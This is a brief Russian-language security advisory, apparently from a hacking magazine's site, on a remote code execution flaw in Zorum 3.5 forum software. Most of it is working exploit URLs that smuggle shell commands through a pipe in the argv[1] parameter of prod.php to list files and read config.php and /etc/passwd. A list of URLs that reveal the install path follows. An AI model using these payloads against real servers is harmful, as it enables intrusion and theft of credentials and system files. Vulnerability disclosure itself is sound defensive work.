Удаленное выполнение произвольного кода в Zorum

Рекомендуем почитать:

Xakep #299. Sysmon

• Содержание выпуска
• Подписка на «Хакер»-60%

Программа: Zorum 3.5

Удаленный пользователь может определить инсталляционный путь и выполнить произвольный код на целевой системе.

1. Выполнение произвольного кода:

http://[target]/zorum/gorum/prod.php?argv[1]=|ls%20-la
http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20../config.php
http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20/etc/passwd

2. Определение инсталляционного пути

http://[target]/zorum/gorum/notification.php
http://[target]/zorum/user.php
http://[target]/zorum/attach.php
http://[target]/zorum/blacklist.php
http://[targ et]/zorum/forum.php
http://[target]/zorum/globalstat.php
http://[target]/zorum/gorum/trace.php
http://[target]/zorum/gorum/badwords.php
http://[target]/zorum/gorum/fl ood.php